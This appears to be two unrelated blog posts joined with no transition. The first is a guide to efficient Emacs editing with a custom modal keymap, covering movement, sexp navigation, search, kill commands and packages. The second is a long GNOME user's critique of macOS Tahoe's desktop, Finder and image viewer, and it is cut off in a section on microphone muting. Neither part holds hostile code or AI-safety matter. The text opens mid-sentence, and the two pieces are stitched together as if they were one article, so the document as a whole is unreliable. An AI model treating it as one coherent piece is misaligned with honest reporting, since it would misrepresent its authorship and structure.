encouraging or discouraging certain patterns.
You can read this in two ways: The general Emacs commands I use to
try to edit the text of programs efficiently, and the specific keybinds
I use in my modal ‘command’ mode to make those commands as convenient as
possible.
No Mouse, No Arrows
All text editing practices rely on minimising the work your fingers
do by minimising the number of keystrokes and keeping your fingers as
close to the home row as possible. This means no arrow keys and no
mouse. This can be enforced by remapping your arrow keys to
ignore
, and by installing the package
disable-mouse
.
Modal Editing: Command
and Insert Modes
Editing code is different from writing prose in that you spend a lot
more time moving around the document, and moving things around
in
the document, than actually writing text. The actions for
moving are more important than the actions for typing, and should
therefore be closer to hand. This is the premise of
modal
editing
: the “default” actions of most keyboard keys are to move,
not to type. For example in the default ‘mode’, hitting ‘a’ doesn’t type
the ‘a’ character, it moves the cursor to the start of the line. To
actually type things, you need to hit a special key which puts you in
‘insert’ mode. Then when you are finished typing, you hit another key
which puts you in the default (or ‘command’) mode.
My modal system is
custom
written
and very lightweight - about 150 lines, not including the
keybinds themselves. I recommend using
a
modal system, if not
mine then someone elses, such as Evil or Meow. But if you really dislike
them, you can still do everything I describe here in vanilla emacs, and
most of the commands already have default keybinds. There are only four
‘custom’ functions I use: the half page scrolls, and the
kill-whole-word/sexp. And all are very simple.
A note on defaults
A problem with customised setups is that they mean you can’t pick up
your friend’s Emacs setup and use it, because your muscle memory will
cause you to hit all the wrong keys. This effect can be mitigated by
sticking with the ‘language’ of the system. Emacs has pretty clear (if
arguably not very good) conventions for most of it’s keys:
f
means forward,
n
means next,
C-g
is always ‘cancel’. My setup tries to stick with these
conventions as much as possible.
f
in command mode is
‘forward-word’.
n
is ‘next line’.
Additionally there is basically no remapping
for insert
mode
. The idea being that editing in a vanilla Emacs is the same as
editing using only insert mode in my setup. I find that you spend a fair
amount of time navigating from
within
insert mode even in my
setup, so you won’t lose your muscle memory.
Leaders
The most common actions for moving around the screen are on a single
keystroke on command mode. For example, to go to the next line, you hit
n
. To go forward by a word, press
f
.
Less common, but still important commands are usually two or three
keystrokes. For example, save file is
vs
. Kill word is
kf
. In these cases, the first key is a ‘leader’ key. I use
a few leader keys:
v
: A general leader key, but mostly for file, buffer
and window operations.
k
: Kill leader: most of the kill commands are under
this.
s
: Search leader: most searches are under this
vp
: Project leader: contains several operations that
are useful when working on a ‘project’ that consists of many files,
which is very common with programming projects.
Getting in and out of insert
mode
To transition from command to insert mode, press
i
. To
transition from insert to command mode, press
C-j
.
There are a few more ways to get into insert mode:
I
: Insert after character
O
: Insert in overwrite mode (overwrite mode will be
cancelled when you return to command mode)
A
: Insert at start of (indented) line
E
: Insert at end of line
C-RET
: Newline and insert
S-RET
: Newline above and insert
Moving Vertically
I recommend you set up relative line numbers, and global-hl-line-mode
so you can clearly see which line your cursor is on and how far away
each line is.
In command mode press
n
to move to the next line, and
p
to move to the previous line. Often they will be used in
conjunction with a numeric prefix: type
12n
to move down 12
lines. This number-prefix pattern is general: you can do most commands
multiple times by typing digits before typing the command.
r
moves up by a half page, and
t
moves down
by a half page while keeping the cursor line in the middle of the
screen. These are used in preference to the usual
scroll-up
and
scroll-down
commands, which move so much you have to
spend a second reorienting.
Two useful and related actions are
recenter-top-bottom
and
move-to-window-line-top-bottom
. These are bound to
l
and
L
respectively.
l
moves the
screen around the current highlighted line - first centring the screen
around the hl-line, then putting the hl-line at the top of the screen,
then at the bottom. It’s best to just try it out.
L
is sort
of the opposite, it moves the
cursor
around the screen, first
to the center, then to the top, then to the bottom.
.
and
,
are ‘beginning-of-defun’ and
‘end-of-defun’. You can think of these as moving by a top level ‘block’.
These are usually pretty useful, but depend on your language mode having
a good definition for what a ‘block’ is.
Less often used, but occasionally useful, are
<
and
>
for moving to the beginning and end of the current
buffer.
Moving Horizontally
Moving horizontally is important, but when programming you should
really avoid using these commands too much in favour of moving in larger
syntactic units - see the later sections on moving by expression and
search.
You should turn on subword mode:
(global-subword-mode 1)
When moving horizontally, try to move in as large a unit as you can.
You should almost never move left or right by an individual character.
The smallest general unit is a “word” - similar to how most editors will
use
Ctrl-Right
to move right by a word. To move forward by
a word, press
f
. To move backward by a word, press
b
.
The definition of a ‘word’ in Emacs can be a bit tricky, especially
when it comes to programming.
foo_bar_baz
is
three
words.
fooBarBaz
(if you’ve got subword mode turned on) is
also three words. So for either of these, if your cursor is on the
f
of
foo
, pressing
f
to go
forward will put you before the
baz
symbol. This is handy
for changing things within a long variable name. But it’s not great for
rapid navigation. Which is why I recommend moving by
expression
over moving by
word
.
If you must move by a single character, use
C-f
and
C-b
respectively.
e
moves to the end of the current line.
a
moves to the start of the current line, but generally you should prefer
m
, which moves to the first non-whitespace character of the
line - which is usually what you want when programming. However, if I’m
trying to move to the start or end of a line, it’s usually because I
want to type something there. And for doing that you can use
A
and
E
respectively, which will move to the
start or end of the line and immediately enter insert mode.
This is it for moving strictly within a line. But for the various
reasons outlined above, you really you shouldn’t use these too much.
There are better ways to move within a line: moving by expression and
moving by search.
Moving by Expression
S-Expressions, or Sexps, are a big thing in lisps and therefore in
Emacs. Most programming languages are syntactically ‘blocks’ of symbols
enclosed in different bracket types. Many use curly braces to denote
execution blocks - function bodies, loops, structure definitions -
square brackets to denote arrays, and parentheses to denote
parameter/argument lists. All fit the s-expression definition. When
you’re moving around a program it can be useful to think in terms of
jumping in to, out of, over, or within those blocks. Emacs has lots of
commands for this, and there are extensions which add even more, but I
really only use four.
j
moves forward by a sexp. If the cursor is over an
opening bracket of any kind, pressing
j
will jump
over
that whole block.
h
will do the same thing,
but backwards. This can effectively be used as a ‘jump to matching
bracket’ command.
If on a non-bracket character, these will jump forward or back by one
syntactic symbol. This should generally be preferred to moving by
word
because in most cases when programming you want to jump
over the symbol, not the word. For example if are at the start of the
variable name
foo_bar_baz
, unless you want to change
something in that variable, you probably want to jump over the whole
thing.
j
will do that, whereas
f
will jump you
to
bar
.
The other two I use are ‘down-list’ (
d
) and up list
(
u
). These jump
into
and
out of
a block.
For example if my editor looks like this, where
|
is the
cursor position:
dele|te(state.im_temp_entity_buffer)
, and
I hit
d
, the cursor will be moved into the next block - in
this case the argument list for delete:
delete(|state.im_temp_entity_buffer)
. Pressing
u
will move the the cursor
out
of that list:
delete(state.im_temp_entity_buffer)|
. This works on any
type of brackets. These can also be used with a negative argument
(e.g.
-d
) to go
back
into and
back
out of
an expression. You can reverse the above sequence with
-d
,
resulting in
delete(state.im_temp_entity_buffer|)
, and then
-u
resulting in
delete|(state.im_temp_entity_buffer)
.
Using these sexp expressions when programming is usually far more
effective than using the horizontal movements like ‘forward-word’, and
you should get into the habit of preferring them.
Moving by Search
Sexps are great, but really the best way to move more than a few
words around your buffer is to move by searching for the string of text
you want to jump to. If the location you want to jump to is on the
screen, this creates a sort of ‘look at, jump to’ dynamic, where you
find where your want your cursor to be with your eyes, type some of the
text at that location, and your cursor is now there. But it also works
great if the location you’re looking for is off the screen.
The simplest commands are the usual ‘isearch-forward’ and
‘isearch-backward’. The mappings for these are unchanged from standard
Emacs:
C-s
and
C-r
. There are packages which
provide alternative versions of this - ‘jump-char’ and ‘avy’, for
example - but I find these work fine.
Sometimes you’re searching for something that is pretty common, and
using incremental search is a slog. In this case, you can use occur,
with
so
, which creates a buffer with all the instances of
the search term, hyperlinked so you can easily jump to that
location.
How to use occur not specific to my setup, but is very useful to
learn, so I’ll go into some detail. When you are in an occur buffer:
M-n
and
M-p
will move up and down, but
won’t
jump the original buffer to the relevant line
n
and
p
will do the same, but it
will
update the original buffer to show the line
M-g M-n
and
M-g M-p
will not only update
the original buffer to show the selected line, but it will make the
original buffer active at that location. A bit hard to explain in words,
but it’s very useful, try it out.
The other useful thing about occur is that, while it’s read only by
default, you can make it editable with
e
. And from here you
can edit
the original buffers
from in the occur window. Huge.
Get back to read-only mode with
C-c C-c
You can also create an occur window for multiple buffer with
multi-occur-in-matching-buffers
. But I find that a bit
fiddly. What I would really like is a ‘project-occur’ which searches for
all instances of a term in a current project. But Emacs doesn’t have
that built in that I’m aware, though I believe it’s in the common
‘projectile’ external package. I use the ‘ag’ package and silver-surfer
search program to search project-wide for terms, but it’s not ideal.
Registers and the Mark
Another way to quickly jump around a buffer is to use registers.
These are short lived ‘bookmarks’, which you can set and return to.
Typically I’ll use these when I want to temporarily jump to another
location from a point I’ll want to return to afterwards. For example,
jumping into a function from the calling location, then back out to the
calling location. Typically I’ll hit
v SPC a
to set my
current location to the register
a
. Then jump to the other
place. Then when I’m done,
vja
will take me back to my
original location. If I want to chain these together, I’ll use the
registers
a
,
s
d
and
f
as a sort of ‘stack’ Often I’ll also want to jump between
two locations repeatedly, so I’ll set them up as
a
and
s
.
An alternative way to get the above behaviour is to the use the
‘mark’ as a very transitory, but automatic, register. When you do most
‘jumps’ in emacs, e.g. using isearch, a temporary register called the
‘mark’ is created in the place you jumped from. Or, you can set it
manually using
gg
.Then, you can jump to that mark
(resetting it to the place you jumped from in the process) with
C-x C-x
. This is a like the
a
and
s
pattern I described above, but with the advantage that
you don’t have to set the register yourself. You can also ‘pop’ the mark
by hitting
C-u g
. And you can do this repeatedly by hitting
C-u g g g
. The downside being that the mark is less
permanent than the registers, so you can accidental set it to something
else, and you’ll find your jumps will take you somewhere you don’t
expect, which is disorienting. For that reason I usually use manual
registers.
Find and replace
While you can use occur mode to do find-replace, generally it’s
easier to use
sq
(query-replace). This is both standard
emacs functionality and works basically the same as other editors
find-replace so I won’t go into how it works.
A variant on that is
vpq
, which is
project
query-replace. It works the same way, but runs through every file in
your project, not just the current buffer.
Killing, or Cut Copy Paste
In the hierarchy of importance of operations in program text editing,
moving around the buffer is top, cut/copy/paste is second, and typing is
third.
We’ve seen that there are lots of options for moving around the
screen using different syntactic units. Moving and ‘killing’ (as emacs
called the operation that is usually called cut) are sort of ‘twinned’:
for each move, there is usually an equivalent kill. And in my setup they
are, where possible, on the same keys, just with a
k
prefix.
So
kf
is kill forward word,
kj
is kill
forward sexp. A full list is below, but if you just think about how you
move by a certain amount, you can usually get the equivalent kill
function this way.
There are a few special cases for kills though. There is
kf
for kill forward word and
kj
for kill
forward sexp, often what you want to do is kill the whole word/sexp
you are currently in
. These are the
ki
(kill whole
word) and
kn
(kill whole sexp) commands. Similarly,
ke
will kill from your point to the end of the line, but
more often you will want to ‘kill whole line’
kl
.
A convenient (though often inefficient) thing to do is kill all the
text in a highlighted region. You can do this is
kw
kill
region. Or you can
copy
a region with
ks
kill
save.
You will often find yourself wanting to kill from your cursor up to a
certain character. Emacs calls this a ‘zap’, and you can do it with
kz
zap to character.
Finally, if you find yourself wanting to join the current line with
the line above it,
k6
will do that.
To paste, just hit
y
(for yank).
Here is the full list of kill commands.
kf
kill word
kb
kill back
kj
kill sexp
kn
kill inner sexp
kh
kill sexp back
ke
kill to end of line
kl
kill whole line
kw
kill region
ks
kill ring save
k6
join line
kr
kill rectangle
kz
zap to character
ki
kill inner word
File and window operations
When programming you spend a lot of time jumping between files and
buffers within the ‘project’. The project usually being defined as the
root of the source repo.
Most of these operations are mapped with the
v
leader
key, and in the case of commands that operate on the whole project,
vp
. None of them are particularly unusual, so I’ll just
list them:
Window commands
w
delete other windows
o
other window
v1
delete other window
v2
split window below
v3
split window right
File commands
vf
find file
vpf
project find file
vs
save file
vps
save project files
vr
recent files (requires some custom setup)
vd
dired
vpd
project root dired
Buffer commands
vk
kill buffer
vpk
project kill buffers
vb
switch buffer
vpb
project switch to buffer
Other useful
things that don’t fit anywhere else
Macros are surprisingly usable in Emacs, though they are something of
an art.
v[
starts defining a macro,
v]
ends
it.
vm
applies the macro. You can apply it repeatedly with
vmmmmm...
LSPs using Emacs LSP implementation eglot are something of a mixed
blessing in my experience. I usually keep it turned off. But sometimes
being able to use ‘xref-find-definition’ (
M-.
) and the
improved tab completion is too useful to ignore.
‘comment-line’
;
I use all the time. If you have a
region highlighted, it will comment out the region.
/
for ‘undo’,
v\
for whitespace cleanup.
q
for ‘fill or reindent’ will usually tidy the formatting
of whichever block you’re in.
x
is ‘execute command’.
z
is repeat.
Rectangle editing is often useful. Highlight the region you want to
edit, and then
kr
to kill it, or
vt
to replace
the rectangle with the thing you type. I find this works for most cases
I would use multi-cursor in other editors.
vv
opens the VC interface (magit, in my case).
I tend to use
sh
to highlight a phrase in a certain
colour when I want something I’m currently working on to show up
clearly.
vi
for imenu, and
vI
for imenu-to-buffer
are reasonable ways to browse your code by ‘section’, provided the
major-mode implements it properly.
I disable a bunch of commands I sometimes hit accidentally with
unpleasant consequences, most annoying the two ‘suspend’ shortcuts
C-z
and
C-x C-z
.
Non-editing Configuration
I have some other stuff in my configuration apart from the above
keybindings. But most of it is either very common (fixing where
temporary files are saved), or very specific to how I like to do things
and not good general advice. For example I turn off transient mark mode,
but I wouldn’t recommend it generally.
Tab completion can be a pain to get it how you like it. I use this,
but it’s not perfect:
I
would
recommend relying on as few external packages as
possible. I use, and would recommend, these ones:
ag
an interface to the silver-surfer search program.
This is a way to search for a term across a whole project. grep is a
reasonable alternative, but I prefer the silver surfer. Use it with
sa
diff-hl
: A utility for highlighting lines that have
changed since your last commit.
magit
: makes using git bearable (or possible, for
things like rebasing)
visible-mark
: indicate visually where the ‘mark’
is.
And a couple of other, language specific ones.
Why not vim?
No reason other than I’m used to emacs. There’s nothing here you
couldn’t equally do with vim.
Recently, I bought my first-ever MacBook.
I’ve spent some time with it, and I gotta say - despite all that hot garbage that is thrown at GNOME for being an OSX clone, GNOME does the job better than I’ve expected, and certainly better than Apple.
In some areas, that is.
Good old days of Linux
A bit of a backstory.
I’ve been using GNUplusSlashLinux for more than fifteen years.
Most of the time, I used GNOME, starting from GNOME2, moving to Unity maybe for two years, then GNOME Shell, then KDE Plasma 5 for another two years, and switched back to GNOME Shell again.
I’m not mentioning some of my at most month-long endeavors to other
DE
s, like XFCE, or tiling WMs, because they never stuck with me.
So I’ve been there for most releases of GNOME Shell, followed them closely, even used to run Ubuntu GNOME when GNOME Shell became a thing, until it became the default in Ubuntu once again.
Though by that time, I had already moved from Ubuntu to a different distribution for a variety of reasons.
I wasn’t always satisfied by GNOME, and was a fair bit vocal about it in the past - even got myself banned from r/gnome subreddit, for shitting on it too much.
That’s why I experimented with other desktop environments, particularly Unity and KDE.
Unity felt like a breath of fresh air after GNOME2, mostly because Canonical took years of people trying to make GNOME2 more OSX-like, and made decent steps in that direction.
A global menu, HUD, blur, buttons on the left - you name it, it was there.
Granted, it wasn’t an OSX clone - rather, it was its own thing, and I still remember Unity days fondly.
I switched to GNOME Shell almost instantly as it was released as Ubuntu GNOME spin, and while it was a bit janky, Unity started to lose steam, and GNOME looked like a hot new thing.
Figure 1:
Anyone else remember that wallpaper? GNOME sure has come a long way
I did, however, run Unity on my older PCs, as it was far less taxing on resources than early versions of GNOME3, but then it was discontinued, and long-awaited Unity 8 with Mir never became a thing.
So, when I was fed up with GNOME being a resource hog, often crashing, and moving towards Wayland, which didn’t work as good as it was advertised, I decided to try KDE somewhere around 2018.
And boy, how wrong was I, thinking that KDE is a buggy mess that would drain my resources even worse than GNOME.
KDE Plasma 5 was nothing like I imagined - it was fast, lightweight, and slick.
As a fan of old Unity design and OSX looks, I’ve configured my plasma, but it wasn’t a full clone, as other people often did.
Instead, I tried to keep Plasma look like Plasma, but feel like a mix between Unity and OSX:
Figure 2:
To this day, I still think this was beautiful. I’ve spent a lot of time fiddling with icon spacings in the top panel, combining widgets, writing my own in QML, just to throw it all away, a few years later
I’ve run Plasma 5 for about two years, and while I was enjoying it, there still were a lot of jank, bugs, occasional crashes (although Plasma recovered from them beautifully), but GNOME also became a lot better.
So I switched back to GNOME, and I’m still running it on my old laptop, where I’m writing this part of the text right now:
Figure 3:
GNOME 42 (Note, I have a 2K display and use GNOME without scaling with enlarged fonts. Helps a lot with too big GNOME UI elements taking up space)
As you can see, there are no fancy extensions - everything is the same as in a stock Fedora Workstation, because it is a stock Fedora Workstation.
And I love it.
Over the years, I had a love-hate relationship with GNOME, but after a while, I came to accept it as it is, and now it feels like a perfect desktop environment for me personally.
That, of course, is thanks to GNOME developers actually trying to make GNOME better, and me buying into their vision of what an OS should look and feel like.
There is still some jankiness to it, but I’m willing to overlook it at this point, because after years of searching, I couldn’t find anything that suits my workflow better.
And I’m fine with that.
A disclaimer
Before I go crazy on bashing macOS, I need to make a disclosure -
I AM BIASED
.
I’ve been using GNOME for a lot of time, and a lot of things that feel logical to me may not feel logical at all to others.
Especially for macOS users.
I’m fully aware of that.
Now, with that outta the way, let’s begin.
A new laptop
As I mentioned, I’ve just got myself a MacBook.
I did it because today’s laptop market is a bit odd.
It’s hard to find a decent non-gaming laptop with good specs.
I mean, there are Lenovo ThinkPads, ThinkBooks, and even IdeaPads that are decent, but I already owned an IdeaPad, and while it served me for six years and I liked it, I don’t know if I want another one.
Other brands may offer similar hardware, but I didn’t investigate much.
One of the reasons is OS choices.
You see, I have run Linux as my main OS since around 2008.
But I still have to use Windows from time to time.
During university years, most of the non-programming software was Windows-only.
After university, I had to use Windows to do media stuff, like music recording and video production, or design.
Design is probably the only task Linux can handle without much of a hassle, given that there are decent programs for that.
For instance, I don’t mind GIMP, Krita, or Inkscape for most of my image-related tasks.
I can even do video editing in Blender (and I do), but for some reason, it just works better under Windows.
Audio production - not a chance.
You’ll find me dead in the ground before I figure out how to set up a realtime kernel and configure Jack.
Not to mention, VSTs just don’t work because many are relying on Windows APIs, and patching them through Wine is not a path I would like to walk.
So I had to use Windows, constantly rebooting from Linux to it every time I wanted to record myself, or work on some video for my channel.
And I also had to use the one that came with my laptop - 6 years ago, it was Windows 10.
My parents recently got a new laptop with Windows 11 on it, and my god, it is horrible.
After using Linux for more than fifteen years, I can’t even imagine how Microsoft is still able to get away with it.
Ads are everywhere - on the lockscreen, in the start menu, in notifications, etc.
You can’t even activate it without connecting to the network and signing into a Microsoft account.
Oh, and updates.
Fucking updates are being forced, while I’m waiting for the next 5 hours until my video finishes rendering, because my laptop is too old to render in 4K.
Yes, it’s possible to “debloat” Windows, remove most of the jank they added, disable automatic updates, and have a decent, clean experience.
I just don’t want to do that.
The whole point of an operating system, to me, is to stay out of the way while managing resources, processes, and making sure my shit is done without major hiccups.
Now, when Windows 10 support is ending, all we’re left with is Windows 11, and god knows what bullshit awaits us in Windows 12.
So I thought to myself: “Ok, I like Linux, but I want to be able to do my media-related stuff, and I don’t want to invest in making Linux be able to do so. What options do I have other than that?”
I just applied to a new job, and almost everyone there uses a Mac, and many of them are musicians, either hobbyists like myself or even professionals.
After asking around, it appeared to me that switching to macOS could be the solution I’m looking for.
It’s a Unix, so I guess my Linux habits won’t have to go through WSL hoops, and it has world-class support for media tasks.
I think macOS can even be considered media-first when it comes to production, unlike Linux or Windows.
So I saved some money and got myself a new MacBook Pro, with M4, and decent specs.
While the laptop itself is nice - I like the aluminium body, keyboard is nice (although I had an opportunity of using their butterfly one, and liked it better), the screen is gorgeous, and even the laptop speakers are great, but…
…but the OS…
macOS
This is the most counter-intuitive, user-unfriendly, confusing piece of software that I’ve used in my life.
And I worked as a consultant in a cellphone store and used software for cashiers, yet it still was not as horrid.
I’m sure nothing I will write here will be new, and I’m committing an “internet crime” of “beating a dead horse” here, while it’s probably already reduced to vapors, but I still want to get it out of my system.
The Desktop
My laptop came with macOS 15 Sequoia preinstalled, so I haven’t used previous versions much, although I had used a Mac a bunch of times in the past when I was at the university ten plus years ago.
However, I decided to immediately upgrade to the 26.1 Tahoe, so I wouldn’t get too used to the good-looking interface, and instead learn to get comfortable with this liquid glass crap.
So I didn’t touch macOS for some years, and some things have changed, but the majority of annoyances I remember are still here.
Virtual desktops
As an ex-GNOME user, I like my virtual desktops.
MacOS has had virtual desktops for a long time, but I think GNOME handled those better.
First of all, switching with the touchpad gesture feels a lot slower.
In GNOME, it wasn’t an animation - the speed was tied directly to how fast you move your fingers, with easing after you release them.
I got used to switching between desktops with a lot of speed, and on macOS, it’s not like that.
It seems it is also tied to the speed of the gesture, but it feels like there’s a cap on the maximum possible speed:
An additional feature of GNOME is that it will automatically create additional virtual desktops once you’ve filled all of them, and there’s no limit to how many you can have.
I usually have 4-5 desktops, but when I’m not working on something, it’s nice that I can only have one or two.
In macOS, you can have as many desktops as you want, however, they’re not added automatically.
Or at least I couldn’t find a setting for that.
Because of that, even if I’m not using all of them, sometimes a stray window is sitting on the last desktop, and I have to go through all of them to get to it.
Fullscreen and maximize button
For some reason, the developers decided that the maximize button should instead act like a fullscreen button in macOS.
When you maximize a window, it is moved to its own, dedicated virtual desktop - and
I like it
.
I have used this pattern in GNOME for a long time by installing an
extension
that brings this feature into GNOME.
However, and it is a big
however
, in GNOME, when I maximize a window, it creates a virtual desktop next to the one I’m on.
In macOS, it also creates a virtual desktop, but it moves it to the far right.
So, imagine I’m browsing the web, seeing something interesting, and I want to open Emacs to take a note.
I open Emacs, maximize it, and on the desktop to the left of Emacs, I still have my browser, and I can switch between these back and forth.
In macOS, if I do this, the window is moved to a desktop at the far end of the list of desktops.
You can rearrange those manually, but it’s clumsy.
I would much prefer if the desktop were created to the right of the current one.
Figure 4:
Emacs was opend on Desktop 1, but after maximizing it is now essentially at Desktop 5
You can prevent this, in some form, by turning on the “Automatically rearrange Spaces based on most recent use” in the settings.
Then, a new fullscreen desktop is created to the right of the one you’re currently on, which is nice, however, then the spaces get rearranged all the time.
Like, when you’re opening a link from the messenger, you switch to a desktop that has the browser open.
The spaces get rearranged, such that the desktop with the messenger is next to the one with the browser, so you have to find the other one that previously was inbetween.
It’s so bizarre that we can’t have fullscreen spaces created next to the current one without automatic rearrangement.
And, because it is a fullscreen mode, it also makes things go a bit haywire for some applications.
Emacs doesn’t like this mode in particular.
Right now, I’m using four virtual desktops and manually organizing those, but maybe I need to adjust my usage pattern.
Speaking of virtual desktops, let’s look at the Mission Control thing.
Mission Control
That’s another pain point for me.
You see, GNOME also has something akin to Mission Control - you swipe up with three fingers, and you see all your open windows:
You can then move your windows between desktops or switch between them.
MacOS also has this, with the exact same gesture:
However, it is far less useful.
In GNOME, I can close windows in the Overview:
Figure 5:
This close button is part of the Overview, not the window manager
I can tweak the dock:
Figure 6:
Actually, the dock is only visible in Overview
I can start typing, and the search appears:
I can even swipe up again and bring up the applications menu:
Figure 7:
Not that I use it that much though
There’s a lot of control!
Wanna know how much you can control in the Mission Control?
You can move windows and desktops around.
…
That’s it!
What mission?
What control?
You can’t do anything.
Sure, one advantage macOS’ mission control has is that you can move entire desktops around - in GNOME, you can’t rearrange desktops themselves, only windows.
And it plays nicely, with all this full-screen nonsense, but I still much prefer the GNOME approach here.
The Dock
Dock is a weird concept.
It’s cool to have it, and I remember in my early Linux days I wanted a macOS-like dock so badly that I tried to make it out of existing panels and custom widgets.
I installed various dock plugins in my desktop environments just to have it zoom in on icons when I hover over them.
These days are long past.
Figure 8:
remember Cairo dock?
Figure 9:
remember Plank?
GNOME made a smart decision to only show the dock when you’re in Overview - their “Mission Control” variant.
You don’t need the dock constantly taking vertical space from your windows, and you don’t have to deal with it showing up accidentally when you simply hover the mouse pointer at the bottom of the screen.
Or at the side of the screen if it is your thing.
When it is only inside the Overview/Mission control, it makes sense as a favorites bar and a way of switching between applications.
I haven’t used
Alt
+
Tab
(or
⌘ command
+
⭾ Tab
) in years because of that.
I would much prefer for the dock to be only visible in Mission Control, but sadly, there’s no way of doing it in macOS, as far as I can see.
Moreover, Dock becomes useless in Mission Control specifically, so it won’t work that well in macOS.
What baffles me is that when you close an app, it stays in the dock, taking up space.
Again, there seems to be no way of disabling it.
Disabling the “Show suggested and recent apps in Dock” in system settings doesn’t affect this behavior.
You have to either use
⌘ Q
, or right-click on the dock item and choose “close”.
What’s the red button in the window for then?
Usually, the app simply continues working in the background, as if minimized.
Speaking of which, so far only the minimize button seems to work in a sane manner.
Sure, there’s little point in actually closing applications, given that this laptop has a lot of RAM and CPU power, but it always felt weird to me that apps want to stay open all the time.
I’m done with you - why do you think that you’re so important that you shouldn’t be closed?
Do what you’ve been told.
The Finder
Linux has always had weird file managers.
To me, nothing beats Microsoft’s Windows 7 file explorer - it was the least BS one in my opinion.
GNOME’s Nautilus, or Files, as it is called nowadays, had a few long-standing problems, some of which date back ten plus years.
KDE’s Dolphin was nice, but too had some weird quirks.
However, it’s nothing in comparison to macOS Finder.
See the screenshot?
A normal file view, right?
Now, what should happen if I shrink the window?
The what?
Who thought that this was a good idea?
For those who didn’t get it, the grid of items remains the same despite the size of the window!
Like, seriously?
The oddities don’t end there.
Where’s the current path?
For some reason, you can only see it when holding the
⌥ option
, it appears at the bottom of the window.
You can, in fact, toggle it in the settings so it is always shown, and while you can click on it to navigate, you can’t edit it, as it seems.
Another oddity is that when moving directories around, there’s no option to merge directories with the same name by default.
I mean, when I move a directory to a different place, where another directory exists with the same name, I expect them to be merged, but the pop-up only says this:
When the
⌥ option
key is pressed preemptively and held during the drag, the option to merge directories appears:
Like, you need to know, before the hand, that the target location you’ve chosen contains a folder with the same name you’re moving right now.
And if you didn’t, you need to repeat the drag.
Why not show it by default?
For the record, when the same thing is done in the GNOME file manager, it asks you if you want to merge directories, but you can’t replace them, so you can’t ever lose data.
And if it contains files with the same names, it asks for each file if you want to replace it, or keep both.
Of course, you can choose to replace all files, so it wouldn’t drag.
Cutting files is also super weird.
You first copy the file as normal, then proceed to the directory you want to move the file, and press
⌘ command
+
⌥ option
+
v
.
Not only does the shortcut itself make your hand curl up as if you were a lobster, but also the semantics of this operation feel extremely weird - you copied the file, after all, why would it move afterwards?
I guess, it’ handy in cases when you thought you wanted to copy the file, but you actually decided to move it, so you don’t need to input a whole new shortcut again, but it’s a minor win in my book.
Thankfully, I use graphical file managers rarely, so I can continue living in my comfort zone of Emacs’ DIRED.
Files and folders
But, while we’re at it, let’s talk about files in general.
I have some local music stored in the
Music
folder.
Some videos and films are stored in the
Videos
folder.
I also have pictures stored in the
Pictures
folder.
Crazy, right?
Imagine using the file system to store files systematically?
I also try to keep things organized, so I manage all these with some directories, like
band-name/album-name/track-name
in case of music files, or
year/place-name/photo
in case of photos.
I like it because if I want to listen to something, I can just drop the folder into the player, or open the image folder and relive those moments.
Organizing these with folders is also handy for backing these things up - just drop the folder to the external drive and you’re good to go.
In macOS, as it seems, tags are the way the system wants to work with files.
It’s a different approach, and I’m not entirely opposed to that, since filesystems are an illusion, after all.
But every once in a while, I open the
Music
folder, and I see a second
Music
folder inside it.
Apparently, it is created when opening the Music app.
I can’t use the Music app because it can’t play FLAC, which is what the majority of my local library is encoded in.
When I open the
Videos
folder, I often find a
TV
folder inside.
I’m not sure what app creates it, but it wasn’t done by me, as I never launched the TV app.
And it appears there far more regularly than the
Music/Music
one.
Other apps often create their own folders anywhere they want.
The OrbStack app creates an
OrbStack
folder in
$HOME
.
Some other app I installed created a folder in the
Music
folder for some reason, even though it didn’t store
music
in it, just some audio files.
It feels like that this is not my computer, but one I share with everyone else, and watch they do as they please with my filesystem.
Never once was this a problem in Linux.
Why can’t apps keep their files to themselves?
I’m tempted to create things like
Music/My Music
, or
Pictures/My Pictures
, and use them specifically, forgetting about the default
Music
,
Pictures
,
Videos
thing, but it is such a cumbersome solution.
It feels like, when you invite friends to a party, and they go to your bookshelf, and decide that they’ll put some of their own stuff on it for the time being.
And when they leave, they forget to take their stuff, but you don’t want to touch it, as it is not exactly yours.
And you can’t throw it out, as your friends will be mad.
I don’t know.
The media viewer
Oh, the image viewer.
Let me ask you a question:
You have a directory with some photos.
You want to go through these photos in the order taken and view them.
What do you do?
In Linux, or Windows for that matter, the answer is simple: you double-click on the image you want to start with, the image viewer is opened, and you can use the arrow keys to go back and forth.
Simple and effective!
What happens when you do it in macOS Finder?
Well, the image viewer still opens, but the arrow keys do nothing!
No, in order to go through images, you need to select the items you want to view, hover over the File menu in the top bar, press the
⌥ option
key, and select “Start slideshow
N
items”:
HUH?
Slideshow is cumbersome, as it is a slideshow - it’s not meant for going through images manually.
Alternatively, you can use a different viewer, called “Quick Look”, which supports arrow keys.
Horray!
But what is it?
If you’re in grid view, why are the arrow keys following the grid too?
HUUUUUH
?
Who thought that this was a good idea?
Hopefully, I won’t repeat this question all too many times.
The only reasonable way of using it is by switching to the list view and using the up and down arrow keys.
Which is still not great, because Quick View is meant to be viewed temporarily.
Any accidental click outside of it will close it, and you’ll have to find where you were and start from there.
You can put it into fullscreen mode, but then the arrow keys stop working.
This seems like such a basic feature for an image viewer, but somehow they’ve managed to make it unusable.
Not only that, but if this folder has any non-image files, like text files or PDFs, they’ll be included in the quick view too.
I understand that the purpose of Quick View is to view files quickly, and often it is a great thing to have, but at the same time, it’s super weird in behavior.
Hardware accessibility
OK, I can go on and on about the software part of the os, but to be honest, all of this is covered by other people rather well.
And, in truth, I couldn’t be bothered to try all other preinstalled software, because it’ll take a lot of time to put it into this already long article, but also because I don’t want to.
For instance, the Music app is also weird, and I already have an
extensive post about how Linux music players are weird
, so it goes without saying that I’ll need to replace it with something else.
Like, the Quick View can play FLAC without any issues, but the Music app (formerly iTunes, I believe) can’t.
Even GNOME’s player could do that, and it kinda copies Apple’s Music app in some aspects.
Reencoding all my library into ALAC - Apple’s equivalent of FLAC for lossless audio is not an option for me.
I did it once before when I was a
happy owner
of an old 4th-gen iPod touch, but never again - it is pointless, there are better music players out there.
So to me, the silver lining is that GNOME’s inbuilt software is in a lot of ways better than one in macOS.
And KDE has even better software than GNOME in a lot of cases.
So instead, let’s talk about hardware oddities and their operating system counterparts.
The Microphone
So, while I do care about my privacy, I can’t call myself a privacy maniac.
However, one thing I like to have in my devices is the ability to mute the microphone.
It’s best when there’s a hardware switch for that, but it’s so rare that I’ve only seen it once in my life on some Lenovo laptop.
I mean, it’s simply more convenient to do that than switch to a specific application that currently uses the microphone and toggle it there.
So, on Linux, I used the microphone key found on my laptop’s keyboard.
It muted the microphone in the system settings.
